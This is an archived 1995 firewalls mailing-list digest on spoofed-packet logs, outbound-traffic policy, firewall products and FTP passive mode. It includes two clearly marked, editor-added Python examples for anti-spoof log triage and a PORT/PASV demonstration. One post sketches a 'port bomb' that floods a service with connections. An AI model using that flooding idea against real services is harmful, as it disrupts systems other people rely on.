firewalls@greatcircle.com; Mon, 15 May 1995 15:03:01 -0400 Message-Id: <199505151903.PAA02817@real.com> To: firewalls@greatcircle.com Subject: Re: Not very well-known ports Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > As I was browsing thru The Firewall Book over the weekend, I noticed > that the authors stated, in at least two places, that they were using > unusual port numbers to move data thru their firewall.
>
> Now I'm wondering, is this something to be recommended to those of us who
> are fairly new to fire-walling, and what are the advantages and
> disadvantages of it?
>

Well, don't count on it for security.. Portscanners can detect that *something* is accepting connections there.. And if it accepts any connection, and it is discovered..... If it is outgoing only, or if it only accepts connections from certain machines (i.e. with tcp_wrapper type technology, or for just 1 machine, specify it in the accept() call) then it is safer (still, a port bomb may disrupt service for a short while (i.e. open a bunch of connections to 'em, and let 'em eventually time out).

From firewalls-owner Mon May 15 14:31:39 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA00132 for firewalls-outgoing; Mon, 15 May 1995 14:02:08 -0700 Received: from software.net (www2.software.net [204.69.144.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA00127 for ; Mon, 15 May 1995 14:02:05 -0700 Received: (jpp@localhost) by software.net (8.6.10/3.2W4) id NAA24968; Mon, 15 May 1995 13:52:08 -0700 Date: Mon, 15 May 1995 13:52:02 +0100 From: John Pettitt Subject: Livingston filter bug? To: Firewalls@GreatCircle.COM Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Hi, I'm using the Livingston "firewall router" as part of my firewall. I have a filter rule that rejects packets from my net that appear on the outside interface; from time to time I see dropped packets in the log that cite this rule. There is no pattern to the destination and they appear to be from my web servers (tcp 80 and 443). As far as I can see there are two explanations.

1) somebody is trying to spoof me
2) the Livingston gets it wrong from time to time

I'm trying to rule out case 2 - has anybody else seen this happen?
John Pettitt jpp@software.net VP Engineering +1 415 473 3065 (V) CyberSource Corporation +1 415 473 3066 (F) From firewalls-owner Mon May 15 15:20:06 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA01772 for firewalls-outgoing; Mon, 15 May 1995 14:50:45 -0700 Received: from gateway.sctc.com (GATEWAY.SCTC.COM [192.55.214.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA01766 for ; Mon, 15 May 1995 14:50:39 -0700 Received: from sccmailhost.sctc.com (sccmailhost.sctc.com [192.55.214.100]) by gateway.sctc.com (8.6.10/8.6.9) with SMTP id QAA04777 for ; Mon, 15 May 1995 16:54:05 -0500 Received: from sccmailhost.sctc.com by sccmailhost.sctc.com id 149930000; 15 May 95 17:50 CDT Received: from sctc.com by sccmailhost.sctc.com id 075810000; 15 May 95 17:50 CDT Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.9) with ESMTP id QAA29982; Mon, 15 May 1995 16:49:53 -0500 Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id QAA10500; Mon, 15 May 1995 16:49:51 -0500 Date: Mon, 15 May 1995 16:49:51 -0500 From: Rick Smith Message-Id: <199505152149.QAA10500@shade.sctc.com> To: firewalls@greatcircle.com Cc: smith@sctc.com Subject: Why control outbound traffic? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Regarding whether there are risks of allowing unrestricted outbound traffic, Bill Bunting summarizes: >1. No. There is not a security problem with allowing unrestricted outgoing >traffic [from a technical perspective]. It all depends on what you mean by "unrestricted" and what you mean by "a technical perspective." In practice, it all comes down to corporate policy. If the internal network contains information that is to be protected from release to the public (i.e. the Internet) then "unrestricted" access is clearly a bad thing. 
At the very least, a responsible organization will monitor outgoing traffic in some fashion to provide confidence that people comply with information protection policies. Further restrictions reduce the organization's window of vulnerability to more sophisticated technical attacks, as Andrew Molitor pointed out.

Rick. smith@sctc.com roseville, minnesota

From firewalls-owner Mon May 15 15:34:32 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA01631 for firewalls-outgoing; Mon, 15 May 1995 14:44:33 -0700 Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA01576 for ; Mon, 15 May 1995 14:44:13 -0700 Received: from csc.com by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950507) id NAA14745; Mon, 15 May 1995 13:18:22 -0700 Received: by csc.com (Smail3.1.29.1 #1) id m0sB6ad-000iF2C; Mon, 15 May 95 16:18 EDT Date: Mon, 15 May 1995 16:18:07 -0400 (EDT) From: Adam Safier To: "' firewalls@greatcircle.com'" Subject: Borderware, NetSP, Eagle, SmartWall Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

I'm in the process of comparing the above firewalls and would like to get input and opinions on the above products. Does anyone have experience, especially with performance on different platforms, war stories, gotchas or opinions on the architecture of these products?

The network they would be protecting has 15+ gateway sites with a T1 mesh backbone shared by several organizations (therefore insecure from my view point.) All gateway sites must communicate with each other although much of the traffic will be directed to a couple of main sites. Each of the gateway sites will also have a "public access server/subnet". Each gateway site will hide a private statewide WAN/LAN network. Users on the protected networks will want to access the Internet.
I estimate 600-900 users in each hidden network. Of course users will also be dialing in and the calls must be authenticated at the firewall.

I'm attracted by Raptor's Eagle (www.raptor.com) and V-One's SmartWall (www.v-one.com) because of the authentication and possible encryption between firewall links (Virtual Private Network (VPN)) but I'm concerned about system load and throughput.

Raptor's Eagle GUI interface and turnkey configuration in the basic system sound real nice. The ability to configure Eagles either from a local console or a central remote console is exciting. A centralized security Help Desk could assist local managers with their configs.

SmartWall sounds real flexible. They include the source code - a modified T.I.S. They have VPNs and a bunch of hooks into different secure card systems, including their own. They also support a WWW server inside the protected network - not sure I want to use that feature. The one catch is they don't have a GUI.

NetSP seems very flexible, especially since they have a SOCKS module that can redirect traffic to dedicated servers if load sharing becomes necessary. I'm a little uncomfortable because the managers could easily misconfigure or misuse the SOCKS module. (I want to tell my kid he can go swimming in the ocean but I'm afraid to let him get in the water!)

BorderWare seems decent considering it's turnkey but I worry about limitations. Their attitude is "we know best". If I want to run Netscape's Server Proxy or some other non-BorderWare proxy I can't.

Thanks, Adam

PS I don't know if I can "publish" my findings here when I get done (bosses have to approve...) but I'll be happy to share what little I know when I know it.
From firewalls-owner Mon May 15 16:01:53 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA00936 for firewalls-outgoing; Mon, 15 May 1995 14:36:13 -0700 Received: from orpheus.amdahl.com (orpheus.amdahl.com [129.212.11.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id OAA00930 for ; Mon, 15 May 1995 14:36:02 -0700 Received: from brittany.oes.amdahl.com by orpheus.amdahl.com with smtp (Smail3.1.29.1 #1) id m0sB7nV-0000JMC; Mon, 15 May 95 14:35 PDT Received: by brittany.oes.amdahl.com (5.0/SMI-4.1/DNS) id AA27471; Mon, 15 May 1995 14:35:33 +0800 Date: Mon, 15 May 1995 14:35:33 +0800 From: patrick@oes.amdahl.com (Patrick Horgan) Message-Id: <9505152135.AA27471@brittany.oes.amdahl.com> To: firewalls@GreatCircle.COM, jay@pcc.com Subject: Re: Packet Filtering, and FTP Customizations X-Sun-Charset: US-ASCII content-length: 3790 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > Both the FAQ and the C&B Firewalls book mention customizing the FTP > client to use either a restricted port range or to use the PASV command > to reverse the origination site of the data connection. > > Has anyone done this? Is there source code or patches available to do > this anywhere? > > Thanks in advance, > > Jay I've got modified clients for socksified rftp, ncftp170, and Mosaic's copy of HTFTP.c. If you have a newer version of libwww, it has support built in and you won't need my hacked copy. I'll include the README I put with these as well. Get them from charon.amdahl.com via anonymous ftp. Look in pub/patrick/pasv_ftp. Why use PASV? When you live inside a firewall, it's common to find yourself without direct access to the internet. To achieve finer control, some people use programs that live on a gateway machine, and accept tcp packets from one side of the gateway and pass them to the other. One such program is the socks daemon. When this is implemented, life suddenly becomes wonderful...unless! 
Some systems are set up to not allow any incoming connections. On these systems, ftp, as normally delivered, will let you connect through socks (or other proxy daemons), but as soon as you want some data shipped back, either because you try to get a file, or because you do something as innocuous as an ls, the connection hangs for a while, and then times out! It's because the remote ftpd wants to do a connection to you to ship back the data. Here's what normally happens:

    Your site                                Remote site

    (hmmm, I'm going to ask for data)
    create a data socket
    bind my address to it.
    listen on the socket
    use the port command to tell the
      remote site what port.
    ask for the data
                                             create a socket
                                             bind my address to it.
                                             do a connect to the port
                                               specified in the port command
                                               received from the client
    accept the connection

When the remote site tries to do the incoming connect, it fails if your site doesn't allow incoming data connections. Luckily the creators of ftp planned for this, and created the PASV command. The PASV command to a daemon tells him to go into "passive" mode, i.e. he will listen for our connect on the data connection. His response to the PASV tells us what port to use on his machine to do the connect. Here's how it works:

    Your site                                Remote site

    (hmmm, I'm going to ask for data)
    create a data socket
    bind my address to it.
    Issue the pasv command
                                             receive the pasv command
                                             create a data socket
                                             bind my address to it
                                             listen
                                             report back the address of my port
    Using the address we got back
      as the response of the PASV,
      do a connect for the data connection.
                                             accept the data connection
    Ask for the data.

_______________________________________________________________________ / These opinions are mine, and not Amdahl's (except by coincidence;). \ | (\ | | Patrick J. Horgan Amdahl Corporation \\ Have | | patrick@amdahl.com 1250 East Arques Avenue \\ _ Sword | | Phone : (408)992-2779 P.O.
Box 3470 M/S 316 \\/ Will | | FAX : (408)773-0833 Sunnyvale, CA 94088-3470 _/\\ Travel | \___________________________O16-2294________________________\)__________/ From firewalls-owner Mon May 15 17:01:37 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA05999 for firewalls-outgoing; Mon, 15 May 1995 16:43:53 -0700 Received: from cseic.saic.com (CSEIC.SAIC.COM [139.121.32.135]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id QAA05994 for ; Mon, 15 May 1995 16:43:49 -0700 Received: by cseic.saic.com (4.1/1.34) id AA23186; Mon, 15 May 95 19:42:08 EDT Date: Mon, 15 May 95 19:42:08 EDT From: steveg@cseic.saic.com (Stephen Harold Goldstein) Message-Id: <9505152342.AA23186@cseic.saic.com> To: jpp@software.net Cc: Firewalls@GreatCircle.COM In-Reply-To: John Pettitt's message of Mon, 15 May 1995 13:52:02 +0100 Subject: Livingston filter bug? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk John Pettitt was seeing packets with "inside" source addresses coming in the "outside" interface of his Livingston router, and put forth two scenarios: >> 1) somebody is trying to spoof me >> 2) the livingston gets it wong from time to time May I put forth another: 3) You have another (undocumented?) connection to the outside and packets are somehow being routed out and over the Internet? Anyone care to comment about how probable/possible this scenario is? Stephen Goldstein steveg@cseic.saic.com My first computer: A 24K Atari 800, Rev. A ROMS, November 1980 Disclaimer: That's not what I said. 
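An added example, not from any of the posts in this thread: the check that John Pettitt's filter rule performs, run over a few constructed log records, followed by a first-pass triage of the three hypotheses raised so far (somebody spoofing, the router getting it wrong, or a second path to the outside). The log line format, the 192.0.2.0/24 "inside" block, the interface name ext0 and the triage heuristic are all assumptions made for this example; Livingston's real log format is not reproduced here.

```python
"""Ingress anti-spoof check and drop-log triage.  Added example."""
import ipaddress
from collections import Counter

# Assumed for the example: the block this site owns and the name of the
# router's external interface.  Livingston's own log format is not shown
# on this page; the lines below use a constructed
# "iface src:sport > dst:dport proto flags" form.
INSIDE_NETS = [ipaddress.ip_network("192.0.2.0/24")]
OUTSIDE_IFACE = "ext0"

# Constructed sample: three "replies" from our own web servers arriving on
# the outside interface, one legitimate copy on the inside interface, and
# one ordinary inbound SYN from an outside address.
SAMPLE_LOG = """\
ext0 192.0.2.10:80 > 198.51.100.7:3341 tcp A
ext0 192.0.2.10:443 > 203.0.113.9:1087 tcp PA
ext0 192.0.2.11:80 > 198.51.100.7:3342 tcp A
int0 192.0.2.10:80 > 198.51.100.7:3343 tcp A
ext0 198.51.100.7:3341 > 192.0.2.10:80 tcp S
"""


def parse_line(line):
    """One constructed log line -> dict."""
    iface, src, arrow, dst, proto, flags = line.split()
    if arrow != ">":
        raise ValueError("bad line: %r" % line)
    saddr, sport = src.rsplit(":", 1)
    daddr, dport = dst.rsplit(":", 1)
    return {"iface": iface, "src": saddr, "sport": int(sport),
            "dst": daddr, "dport": int(dport), "proto": proto, "flags": flags}


def is_inside(addr):
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in INSIDE_NETS)


def violates_ingress_rule(pkt):
    """Pettitt's rule: one of our own source addresses must never arrive
    on the outside interface."""
    return pkt["iface"] == OUTSIDE_IFACE and is_inside(pkt["src"])


def find_violations(log_text):
    pkts = (parse_line(l) for l in log_text.splitlines() if l.strip())
    return [p for p in pkts if violates_ingress_rule(p)]


def classify(violations):
    """Heuristic triage (an assumption of this example, not a router feature).
    Someone forging inside addresses to reach a service has to send SYNs or
    datagrams; TCP segments with ACK set and SYN clear, sourced from our
    servers' own service ports, look like replies that left by some other
    path and came back in (Goldstein's third case) or a router mistake.
    Flags are attacker-chosen, so this narrows the search, it does not prove."""
    if not violations:
        return "none"

    def is_reply(p):
        return p["proto"] == "tcp" and "A" in p["flags"] and "S" not in p["flags"]

    if all(is_reply(p) for p in violations):
        return "reply-leak"
    if any(p["proto"] != "tcp" or ("S" in p["flags"] and "A" not in p["flags"])
           for p in violations):
        return "spoof-attempt"
    return "indeterminate"


def summarize(log_text):
    v = find_violations(log_text)
    return {"violations": len(v),
            "by_sport": dict(Counter(p["sport"] for p in v)),
            "verdict": classify(v)}


if __name__ == "__main__":
    print(summarize(SAMPLE_LOG))
```

A "reply-leak" verdict on the sample (every offending packet has ACK set, SYN clear, and comes from port 80 or 443 of a host we own) is a reason to go looking for the undocumented path Stephen Goldstein suggests and to check the routing tables Guido asks for; it is not proof that nobody is spoofing, since a spoofer can set whatever flags they like.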
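A second added example, again the editor's and not code posted to the list: the two exchanges Patrick Horgan diagrams in his post above, carried out on the loopback interface, together with the h1,h2,h3,h4,p1,p2 encoding that the PORT command and the 227 reply share. The directory listing is constructed. What to watch is which side calls connect(): in active mode the server connects in to the client, which is exactly the connect a no-inbound gateway refuses; in passive mode the client connects out.

```python
"""PORT vs PASV on loopback.  Added example, not code from the list."""
import re
import socket
import threading

HOSTPORT_RE = re.compile(r"(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})")


def encode_hostport(host, port):
    """h1,h2,h3,h4,p1,p2: the form both the PORT command and the 227
    reply use (RFC 959); the port is p1*256 + p2."""
    return "%s,%d,%d" % (host.replace(".", ","), port >> 8, port & 0xFF)


def decode_hostport(text):
    """Pull host and port out of a PORT command or a 227 reply."""
    m = HOSTPORT_RE.search(text)
    if m is None:
        raise ValueError("no h1,h2,h3,h4,p1,p2 in %r" % text)
    n = [int(x) for x in m.groups()]
    if max(n) > 255:
        raise ValueError("octet out of range in %r" % text)
    return "%d.%d.%d.%d" % tuple(n[:4]), (n[4] << 8) | n[5]


def port_command(host, port):
    return "PORT " + encode_hostport(host, port)


def pasv_reply(host, port):
    return "227 Entering Passive Mode (%s)" % encode_hostport(host, port)


def _listener():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))          # kernel picks a free port
    s.listen(1)
    return s


def _recv_all(conn):
    chunks = []
    while True:
        b = conn.recv(4096)
        if not b:
            return b"".join(chunks)
        chunks.append(b)


def active_transfer(payload):
    """Default ("active") FTP: the client listens, announces the port with
    PORT, and the *server* connects in.  A gateway that refuses inbound
    connects blocks this connect (the hang-then-timeout on 'ls')."""
    client_listener = _listener()
    cmd = port_command(*client_listener.getsockname())
    host, port = decode_hostport(cmd)          # what the server parses

    def server_side():
        c = socket.create_connection((host, port))   # inbound to the client
        c.sendall(payload)
        c.close()

    t = threading.Thread(target=server_side)
    t.start()
    conn, _ = client_listener.accept()
    data = _recv_all(conn)
    conn.close(); t.join(); client_listener.close()
    return "server->client", data


def passive_transfer(payload):
    """PASV: the server listens and reports where; the *client* connects
    out, so nothing inbound ever has to pass the gateway."""
    server_listener = _listener()
    reply = pasv_reply(*server_listener.getsockname())

    def server_side():
        c, _ = server_listener.accept()
        c.sendall(payload)
        c.close()

    t = threading.Thread(target=server_side)
    t.start()
    host, port = decode_hostport(reply)        # what the client parses
    conn = socket.create_connection((host, port))  # outbound from the client
    data = _recv_all(conn)
    conn.close(); t.join(); server_listener.close()
    return "client->server", data


if __name__ == "__main__":
    listing = b"drwxr-xr-x   2 ftp  ftp  512 May 15 1995 pub\r\n"   # constructed
    print(active_transfer(listing))
    print(passive_transfer(listing))
```

A packet filter on the client side can then be written to allow outbound TCP only (plus the established return traffic), which is what Benjamin's and Tim Keanini's replies later in this thread rely on when they recommend a PASV-capable client such as ncftp or Netscape.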
From firewalls-owner Mon May 15 17:23:50 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA06582 for firewalls-outgoing; Mon, 15 May 1995 17:00:31 -0700 Received: from armitage.cyberspace.com (armitage.cyberspace.com [199.2.48.15]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id RAA06577 for ; Mon, 15 May 1995 17:00:26 -0700 Received: from case (case.cyberspace.com) by armitage.cyberspace.com (4.1/SMI-4.1) id AA09419; Mon, 15 May 95 16:59:35 PDT Date: Mon, 15 May 95 16:59:35 PDT From: billcurr@cyberspace.com (Bill Curr) Message-Id: <9505152359.AA09419@armitage.cyberspace.com> Received: by case (4.1/SMI-4.1) id AA17391; Mon, 15 May 95 17:00:52 PDT Subject: WebServers and Firewalls To: Firewalls@GreatCircle.COM X-Mailer: AIR Mail 3.X (SPRY, Inc.) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Boarderware seems decent considering it's turnkey but I worry about >limitations. Their attitude is "we know best". If I want to run >Netscapes Server Proxy or some other non-Borderware proxy I can't. Excuse my ignorance on firewalls in general, but this leads me to inquire what is the relationship between a firewall and a web server? I have heard suggestions to put a web server "in front" and/or "behind" a firewall. By design, usually web servers are passing out information for every and anybody. I am looking at getting a web server (NetScape Commerce Server) with the idea of having some areas "off-limits" to the general public. It would not need heavy-duty security, more just a password to discourage casual access. But what if we wanted to have high security, say, having folks access an FTP library from our homepages? 
Thanks-- -bill -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- "Printmaker gone digital" billcurr@cyberspace.com http://www.cyberspace.com/billcurr -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- From firewalls-owner Mon May 15 22:01:44 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA10218 for firewalls-outgoing; Mon, 15 May 1995 22:00:20 -0700 Received: from world1.worldbit.com (gw.worldbit.com [199.4.64.236]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id WAA10212 for ; Mon, 15 May 1995 22:00:13 -0700 Received: (blast@localhost) by world1.worldbit.com (8.6.10/A/UX 3.1) id WAA06667; Mon, 15 May 1995 22:09:16 -0700 Date: Mon, 15 May 1995 22:09:15 -0700 (PDT) From: Tim Keanini To: firewalls@greatcircle.com Subject: Re: Packet Filtering, and FTP Customizations (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Subject: Re: Packet Filtering, and FTP Customizations On Mon, 15 May 1995, Patrick Horgan wrote: > > > > Both the FAQ and the C&B Firewalls book mention customizing the FTP > > client to use either a restricted port range or to use the PASV command > > to reverse the origination site of the data connection. > > > > Has anyone done this? Is there source code or patches available to do > > this anywhere? [lots deleted] > report back the address of my port > Using the address we got back > as the response of the PASV, > do a connect for the data connection. > accept the data connection You should really consider using 'ncftp'. It is very nice if you are stuck using a command line ftp client from within a packet filtering router. You can just type 'passive' to go into PASV mode or you can have it go into it automatically with a rc file. --blast %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% \ Tim Keanini | "The limits of my language, / / aka blast | are the limits of my world." 
\ \ | --Ludwig Wittgenstein / / | \ \ +================================================/ / for more info on BayMOO... \ \ email baymoo@worldbit.com / %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

From firewalls-owner Mon May 15 23:31:26 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA11234 for firewalls-outgoing; Mon, 15 May 1995 23:15:11 -0700 Received: from uucpB.tokyo.spin.ad.jp (uucpB.tokyo.spin.ad.jp [165.76.8.11]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id XAA11229 for ; Mon, 15 May 1995 23:15:08 -0700 From: mitubori@tsi.co.jp Received: (uucp@localhost) by uucpB.tokyo.spin.ad.jp (8.6.9+2.4Wb3/3.2W3-uucpB) with UUCP id OAA20674 for Firewalls@GreatCircle.com; Tue, 16 May 1995 14:41:52 +0900 Received: from tsims.tsi.co.jp (mailhost) by tsigw.tsi.co.jp (4.0/6.4J.6-92.1) id AA09016; Tue, 16 May 95 14:11:08 JST Received: from s_kenkyu.tsi.co.jp by tsims.tsi.co.jp (4.2/6.4J.5-92.1) id AA03493; Tue, 16 May 95 13:59:40 JST Received: by s_kenkyu.tsi.co.jp (4.2/6.3Junet-1.0) id AA29379; Tue, 16 May 95 14:11:37 JST Date: Tue, 16 May 95 14:11:37 JST Message-Id: <9505160511.AA29379@s_kenkyu.tsi.co.jp> To: Firewalls@GreatCircle.com Subject: NTP on a bastion system Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Hi all,

Has anyone known of, or had experience with, tools that relay traffic back and forth between two NTP servers? They must run on a bastion system (FWTK, SunOS 4.1.4). Any help will be much appreciated. Thanks in advance.

==================================================================== Hajime Mitsubori Toden Software, Inc Senior Engineer Engineering Research & Development Dept. Voice: +81-3-3596-7662 Tepco Minami Kobiki Bldg.
Fax: +81-3-3586-7652 8-20-30 Ginza, Chuo-ku, E-mail: mitubori@tsi.co.jp Tokyo 104, Japan ====================================================================

From firewalls-owner Tue May 16 00:01:12 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA11418 for firewalls-outgoing; Mon, 15 May 1995 23:41:52 -0700 Received: from relay.philips.nl (relay.philips.nl [130.144.65.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id XAA11410 for ; Mon, 15 May 1995 23:41:47 -0700 Received: from cnps.lss.cp.philips.com ([130.144.198.1]) by relay.philips.nl (8.6.9/8.6.9-950414) with SMTP id IAA10781; Tue, 16 May 1995 08:40:59 +0200 Received: from kitty.lss.cp.philips.com by cnps.lss.cp.philips.com with smtp (Smail3.1.28.1 #1) id m0sBHPG-0001v1C; Tue, 16 May 95 08:51 MET Received: by kitty.lss.cp.philips.com (Smail3.1.28.1 #1) id m0sBGHo-0001ypC; Tue, 16 May 95 08:39 MET DST Message-Id: From: guido@kitty.lss.cp.philips.com (Guido van Rooij) Subject: Re: Livingston filter bug? To: jpp@software.net (John Pettitt) Date: Tue, 16 May 1995 08:39:20 +0200 (MET DST) Cc: Firewalls@GreatCircle.COM In-Reply-To: from "John Pettitt" at May 15, 95 01:52:02 pm Reply-To: Guido.vanRooij@nl.cis.philips.com (Guido van Rooij) X-Mailer: ELM [version 2.4 PL21] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 524 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

John Pettitt wrote:
>
> Hi, I'm using the Livingston "firewall router" as part of my firewall,
> I have a filter rule that rejects packets from my net that appear on
> the outside interface, from time to time I see dropped packets in the
> log that cite this rule. There is no pattern to the destination
> and they appear to be from my web servers (tcp 80 and 443).
>

You'll have to be more specific. Tell us your network architecture, routing tables, etc. There are numerous other options than the two below.
-Guido From firewalls-owner Tue May 16 02:03:58 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA14955 for firewalls-outgoing; Tue, 16 May 1995 01:43:09 -0700 Received: from relay1.pipex.net (relay1.pipex.net [158.43.128.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id BAA14943 for ; Tue, 16 May 1995 01:42:51 -0700 Received: from ndl.co.uk (actually ns.ndl.co.uk) by flow.pipex.net with SMTP (PP); Tue, 16 May 1995 09:42:27 +0100 Received: from paladin.ndl.co.uk by ndl.co.uk (4.1/SMI-4.1) id AA01107; Tue, 16 May 95 09:42:21 BST Message-Id: <9505160842.AA01107@ndl.co.uk> X-Sender: martin@mailhost.ndl.co.uk X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 16 May 1995 09:42:22 +0100 To: Firewalls@GreatCircle.COM From: martin@ndl.co.uk (Martin J Norman) Subject: contact info for Internetware Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, can anyone supply me with some contact details for Internetware please. They do the IWare fireware product. thanks, martin --------------------------------------------------------------------- Martin J Norman. Senior Software Engineer Network Designers Ltd. 
4 Wharf Mews Cliffe Terrace Wetherby West Yorkshire LS22 6LX England Phone: +44 (0)1937 580101 Fax: +44 (0)1937 580021

From firewalls-owner Tue May 16 03:31:34 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA16261 for firewalls-outgoing; Tue, 16 May 1995 03:23:12 -0700 Received: from icnucevx.cnuce.cnr.it (icnucevx.cnuce.cnr.it [131.114.1.30]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id DAA16256 for ; Tue, 16 May 1995 03:22:47 -0700 Received: from fly.cnuce.cnr.IT by mailsrv.cnuce.cnr.it (PMDF V4.3-13 #6635) id <01HQKK1FAU0W95N7ES@mailsrv.cnuce.cnr.it>; Tue, 16 May 1995 12:22:22 +0100 (MET) Received: by fly.cnuce.cnr.IT (Smail3.1.26.7 #1) id m0sBJmE-00028qC; Tue, 16 May 95 12:22 MET Date: Tue, 16 May 1995 12:22 +0100 (MET) From: claudio@fly.CNUCE.CNR.IT (Claudio Telmon) Subject: Re: Why control outbound traffic? To: firewalls@greatcircle.com Message-id: Content-transfer-encoding: 7BIT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

>1. No. There is not a security problem with allowing unrestricted outgoing
>traffic [from a technical perspective].

There is a problem with outgoing connections: clients can be bugged as much as servers (maybe more), and connection + bug = security problem. The only differences between inbound and outbound connections IMHO are:

- Outbound connections are decided from the inside. This means that the time and the destination host are decided by the client. This requires a bit of social engineering to let the client connect to the "right" server, or some rerouting, maybe. With WWW this isn't a big problem: just add a link in the right document.

- Outbound connections are usually started without special privileges. This may require some additional work to become superuser.

- Clients are managed by users :)

Am I wrong?
- Claudio From firewalls-owner Tue May 16 05:01:22 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA17085 for firewalls-outgoing; Tue, 16 May 1995 04:55:16 -0700 Received: from net.nns.navy.mil (et0.nns.navy.mil [138.169.13.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id EAA17080 for ; Tue, 16 May 1995 04:54:39 -0700 Received: from atis.nns.navy.mil by net.nns.navy.mil (5.65c/1.921207) id AA07021; Tue, 16 May 1995 07:56:00 -0400 Message-Id: Priority: Urgent To: Firewalls Discussion List Mime-Version: 1.0 From: kwb Date: Tue, 16 May 95 07:53:42 -0500 (EDT) Content-Type: text/plain; charset=US-ASCII; X-MAPIextension=".TXT" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk please remove from mailing list Kevin W. Bowden SSN688 Planning Yard Systems Administrator Dept. E23B, Bldg 800 12129 Jefferson Ave. Newport News, VA 23602 Voice - 804-688-3498 Fax - 804-688-2225 e-mail - kwb@net.nns.navy.mil From firewalls-owner Tue May 16 05:15:11 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA17008 for firewalls-outgoing; Tue, 16 May 1995 04:37:47 -0700 Received: from moat.cna.org (MOAT.CNA.ORG [192.189.236.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id EAA17003 for ; Tue, 16 May 1995 04:37:45 -0700 Received: by moat.cna.org; id HAA19365; Tue, 16 May 1995 07:39:06 -0400 Received: from ngw.cna.org(192.189.234.8) by moat.cna.org via smap (V1.3) id sma019363; Tue May 16 07:38:49 1995 Received: from cnau-Message_Server by ngw.cna.org with Novell_GroupWise; Tue, 16 May 1995 07:37:29 -0400 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Tue, 16 May 1995 07:36:01 -0400 From: David M Funk To: firewalls@greatcircle.com Subject: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >>> Rick Smith 05/15/95 05:49pm >>> >At the very least, a responsible organization will monitor outgoing traffic > in some fashion to provide confidence 
that people comply with information >protection policies.

Our organization has proprietary information that is not releasable to the public. This information resides in desks and computers. We do not monitor the briefcases and pockets of employees leaving the building. Are you saying that this is not a responsible organization? I think not.

